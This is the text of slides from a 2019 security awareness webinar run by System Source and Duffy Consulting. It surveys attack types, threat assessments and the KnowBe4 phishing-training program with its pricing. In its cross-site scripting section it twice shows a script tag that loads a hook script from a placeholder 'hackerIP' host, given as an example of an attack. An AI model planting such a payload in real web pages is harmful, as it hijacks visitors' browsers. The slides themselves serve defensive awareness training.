Welcome!

System Source Pizza Webinar

Security AwarenessSeptember 26, 2019

Email:

Michelle Robinson – Learning Center Director

Email: mrobinso@syssrc.com

Agenda Welcome from Michelle Robinson, System Source Learning Center Director

and Shawn Duffy, President of Duffy Consulting Services, LLC

The importance of cyber security – Why security is still a problem

Types of attacks

Best practices for implementing Cyber Security – Why outsourcing is good practice

Assessment vs. scanning

The important role of the end-user

Q & A

Evaluation @ end of webinar & via email

If it hasn’t arrived by 12:15

Please double check with your receptionist

Then call / email Mike Jones:

mjones@syssrc.com OR 410-771-5544 x4355(we are recording the webinar – so don’t think twice about stepping away

for a few minutes to go pick it up at your front desk!

We Hope You

are Enjoying

Your Pizza!!

During the Webinar…

Audio – In presentation mode until end

Control Panel

View webinar in full screen mode

Feel Free to submit written questions

Open Q & A at the end

(please mute when not speaking)

Survey at conclusion of webinar

Shawn DuffyPrincipal

Duffy Compliance Services

Duffy Consulting Services (DCS)Cybersecurity Analysts help prevent attacks through their expertise and knowledge of threats and security controls.

Security controls:Safeguards or countermeasures to avoid, detect, counteract, or minimize security risks to physical property, information, computer systems, or other assets.

Take the guesswork out of how to secure your environment

DCS = Cybersecurity AnalystSo why is security still a problem?

What exactly am I buying?

Security is not a component to making money

Security is not mandated – it is often considered overhead

What are the long-term costs?

How much I afford?

Businesses have a different focus

DCS = Cybersecurity AnalystSo why is security still a problem?

Security is like insurance

What is my risk-to-reward ratio?

Just a little security is fine. It’s not like I am forced to buy it.

DCS = Cybersecurity AnalystWhat about Compliance?

Compliance = Driven by “Check the Box”

“Can we just say we do it and figure out how later if we get audited?”

Compliance = the minimum set of security controls required

DCS = Cybersecurity Analyst“Tried & True” method to secure the environment

Is that enough?

DCS = Cybersecurity AnalystTypes of Attacks

Impersonation

MitM

Session Hijacking

XSS

Privilege Escalation

Backdoors & Rootkits

Ransomware/Phishing

Ransomware / Phishing

Ransomware / Phishing

Ransomware / Phishing

Ransomware / Phishing

MitM attack

MitM attack

MitM attack

MitM attack

MitM attack

MitM attack

Cross Site Scripting (XSS)

<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>

Cross Site Scripting (XSS)

<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>

DCS = Cybersecurity AnalystHow do you know your secure?

What the client gets using this method?

If outsourced, a hefty bill

CVSS scored results with little to do with your environment

Questions how to proceed

The cheap way:

Buy a scanner

Learn to run scans

Print out huge canned reports

Figure out what’s important

DCS = Cybersecurity AnalystBest Practices – Threat Assessments

Subject Matter Expert (SME) way:Baselines

Information Gathering (including scans)

Data Analysis

Security Controls and Risk Analysis

Customized reporting and presentation

Findings based on the environment

Plan of Action

Building robustness into the environment

Prepares for Penetration Testing

DCS = Cybersecurity AnalystBest Practices – Assessments

Information GatheringInfrastructure documentation

Security documentation

Network and host-based logs

Rulesets

Configuration and Configuration Management

Network traffic and metrics

Approved Ports, Protocols, and Services

Vulnerabilities

Web Application information

Wireless information

DCS = Cybersecurity AnalystBest Practices – Assessments

Review and AnalysisDetermines gaps in security controls

Determines impacts to the business

Penetration TestingSystem toleration to real-world attacks

Sophistication of attacker matters

Social Engineering (Phishing, Backdoors)

Password cracking

Wi-Fi access

Tests Countermeasures

Tests Detection and Response capabilities

DCS = Cybersecurity AnalystBest Practices – Assessments

ReportingFindings

Supporting Documentation

Recommendations

Briefings and Presentations

RemediationPlan of Action

Metrics to measure results

Roles & Responsibilities

Re-evaluations

DCS = Cybersecurity AnalystBest Practices – Assessments

Cost effective solution with progress milestones

Preparation for Pen Testing against the system

Answers on how to proceed

Results that are specific to your environment

Technical Support on conducting remediation

Re-evaluations confirming remediation tasks

Metrics to track security progress

What the client gets using this method?

Duffy Compliance Services

Security Compliance ServicesNIST-based such as DFARS CUI, HIPAA, FISMA

E.U. GDPR and U.S. State Privacy Acts (NYDFS & CCPA)

Security Policy and Procedure Development

Threat Management

Network Assessments

Web Application Assessments

Wireless Assessments

Continuous Monitoring

Security Awareness Training

Michelle RobinsonLearning Center Director

System Source

System Source and KnowBe4

Partnering to deliver high quality training and phishing tests

About KnowBe4

• World’s most popular Security Awareness Training and Simulated Phishing platform

• Training based on Kevin Mitnick’s 30+ years’ experience (The Dark Side Hacker)

Gartner peer insights puts KnowBe4 at the top of the list for overall rating including:

• Product capabilities• Customer experience• Willingness to recommend

We’ve helped 5,103

customers use KnowBe4!

KnowBe4 Recognized by Gartner as a Leader – 3 Years in a Row

Magic Quadrant for Security

Awareness Computer-Based

Training 2019

Why We Phish and Train

A staggering

91%of successful data

breaches start with a spear phishing attack

Users Are the Last Line of Defense

• 91% of successful data breaches start with a spear phishing attack

• 30% of data breaches are caused by repeat offenders from within the organization

Why We Phish and Train

2019 Verizon Report Findings

There is good news!

Phish breach rates are going down.

Why?

2019 Verizon Report FindingsTop Breaches:

Phishing - #1

Use of Stolen Credentials

Backdoors or C2 (Command and Control)

Top Hacking Techniques:

Email is the #1 delivery method

Office Document is the #1 file type

Phishing is the #1 technique

Human is the #1 target

CEO Fraud

Phishing Test Click Rate by Industry

Our Approach

Baseline Testing

We provide baseline testing to assess the Phish-prone percentage of your users through a free simulated phishing

attack.

Train Your Users

The world's largest library of security awareness training content; including interactive modules, videos, games, posters

and newsletters. Automated training campaigns with scheduled reminder emails.

Phish Your Users

Best-in-class, fully automated simulated phishing attacks, hundreds of templates with unlimited usage, and community

phishing templates.

See The Results

Enterprise-strength reporting, showing stats and graphs for both training and phishing, ready for management. Show the

great ROI!

Baseline Testing

4 templates for your free baseline phishing test

O365

Exchange

Gsuite

Network password

KnowBe4 Training Modules

Silver – Basic training modules, simulated testing, reporting

Gold – Silver, plus intermediate training content, Email Exposure Check (EEC)

reports, vishing tests

Platinum – Silver, Gold, advanced phishing features; Smart Groups, Reporting

APIs, security roles, Social Engineering Indicator landing pages

Diamond – Silver, Gold, Platinum, advanced training content; full access to 700+

items including interactive modules, videos, games, posters and newsletters.

World’s Largest Library of Security Training Content In 4 Libraries

Most Common Phishing Lures

Most Common Phishing Lures

Sample Phishing Tests

Sample Phishing Tests

2019 Phishing By Industry Benchmarking Study

KnowBe4 analyzed data from nearly nine million users across 18,000 organizations with over 20 million simulated phishing security tests across nineteen different industries.

2019 Phishing By Industry Benchmarking Study

Results after 90 Days

2019 Phishing By Industry Benchmarking StudyResults after training and phishing for 1 year

Reporting

Reporting

0%

5%

10%

15%

20%

25%

30%

Phis

h P

rone

%

Training Impact on Phish Prone Staff52 person sample

Training

implemented

for those

failingNew hires

without

training

Value Proposition:

Risk and Operational Expenses

RISK• Reduced malware infections

• Reduced data loss

• Reduced potential cyber-theft

• Users have security top of mind

OPEX• Reduced help desk calls

• Reduced cleaning and re-imaging of machines

• Reduced downtime, increased user productivity

• Real ROI: Forrester's Total Economic Impact™ on

KnowBe4 reports a 127% ROI with a one-month

payback

Social Engineering is

information security’s weakest

link.”

– Kevin Mitnick, ‘The World’s Most Famous Hacker’, IT

Security Consultant

“11

Subscription Levels and Pricing

Silver Level

Admin Management Console

Unlimited Phishing Security Tests

Automated Security Awareness Program

Training Access Level I

Automated Training Campaigns

Crypto-Ransom Guarantee

Phish Alert Button

Active Directory Integration

Phishing Reply Tracking

Security ‘Hints & Tips’

Gold Level

Training Access Level II

Monthly Email Exposure Check

Vishing Security Test (voice mail)

Platinum Level

“Automated Human Pentesting”

USB Drive Test

Vulnerable Browser Plugin Detection

Priority Level Support

Social Engineering Indicators

Diamond Level

Training Access Level III

AIDA Artificial (AI Agent)

Intelligence-driven Agent BETA

Seats (Per Year) Corporate Education/Non-Profit

25-50 $17.00-$29.50 $15.30-$26.55

51-100 $15.00-$26.50 $13.50-$23.85

101-500 $11.00-$20.50 $9.90-$18.45

501-1000 $10.00-$19.00 $9.00-$17.10

Optional Setup Fee for steps 1-5 is $20/person to a maximum of $1,000

Thank you!

Q&APlease “Type in your

question”

& we will read your question

and answer☺